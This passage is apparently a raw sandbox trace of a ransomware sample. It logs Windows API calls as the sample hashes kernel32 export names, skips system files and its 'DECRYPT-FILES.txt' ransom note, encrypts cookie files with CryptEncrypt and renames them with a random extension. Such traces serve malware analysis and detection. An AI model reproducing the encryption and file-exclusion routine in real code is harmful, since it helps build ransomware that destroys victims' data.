lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.795] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.795] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.795] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.795] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.795] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.795] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.795] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.795] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.795] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.795] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.795] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.795] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.795] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.795] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.795] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.796] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.796] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt") returned 105 [0078.796] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh") returned 113 [0078.796] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mvmbcfh"), dwFlags=0x0) returned 1 [0078.797] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.797] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.797] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.797] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1d72bcd0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1e6a4bd0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0x1e6a4bd0, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x227, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adobe[3].txt", cAlternateFileName="5P0100~1.TXT")) returned 1 [0078.797] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0078.797] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="autorun.inf") returned -1 [0078.797] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="boot.ini") returned -1 [0078.797] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="desktop.ini") returned -1 [0078.797] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="ntuser.dat") returned -1 [0078.797] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="iconcache.db") returned -1 [0078.797] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="bootsect.bak") returned -1 [0078.798] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="ntuser.dat.log") returned -1 [0078.798] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="thumbs.db") returned -1 [0078.798] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt", lpString2="Bootfont.bin") returned -1 [0078.798] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adobe[3].txt") returned 33 [0078.798] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0078.798] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0078.798] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0078.798] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0078.798] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0078.798] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adobe[3].txt") returned 33 [0078.798] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0078.798] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@adobe[3].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt" [0078.798] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.798] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.799] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=551) returned 1 [0078.799] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.799] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.799] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.800] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.800] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.800] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0078.800] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0078.800] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.801] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0078.801] CloseHandle (hObject=0x45c) returned 1 [0078.801] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.801] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0078.802] CloseHandle (hObject=0x0) returned 0 [0078.802] CloseHandle (hObject=0x458) returned 1 [0078.803] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.803] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.803] GetTickCount () returned 0x114c321 [0078.803] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.803] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0078.803] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0078.804] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.804] lstrlenA (lpString="kernel32.dll") returned 12 [0078.804] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0078.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0078.804] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0078.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0078.804] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0078.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0078.804] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0078.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0078.804] lstrlenA (lpString="ADDATOMA") returned 8 [0078.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0078.804] lstrlenA (lpString="ADDATOMW") returned 8 [0078.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0078.804] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0078.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0078.804] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0078.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0078.804] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0078.804] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0078.805] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0078.805] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0078.805] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0078.805] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0078.805] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0078.805] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0078.805] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0078.805] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0078.805] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0078.805] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0078.805] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0078.805] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0078.805] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0078.805] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0078.805] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0078.805] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0078.805] lstrlenA (lpString="BACKUPREAD") returned 10 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0078.805] lstrlenA (lpString="BACKUPSEEK") returned 10 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0078.805] lstrlenA (lpString="BACKUPWRITE") returned 11 [0078.805] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0078.806] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0078.806] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0078.806] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0078.806] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0078.806] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0078.806] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0078.806] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0078.806] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0078.806] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0078.806] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0078.806] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0078.806] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0078.806] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0078.806] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0078.806] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0078.806] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0078.806] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0078.806] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0078.806] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0078.806] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0078.807] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0078.807] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0078.807] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0078.807] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0078.807] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0078.807] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0078.807] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0078.807] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0078.807] lstrlenA (lpString="BEEP") returned 4 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0078.807] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0078.807] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0078.807] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0078.807] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0078.807] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0078.807] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0078.807] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0078.807] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0078.808] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0078.808] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0078.808] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0078.808] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0078.808] lstrlenA (lpString="CANCELIO") returned 8 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0078.808] lstrlenA (lpString="CANCELIOEX") returned 10 [0078.808] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CancelSynchronousIo" | out: 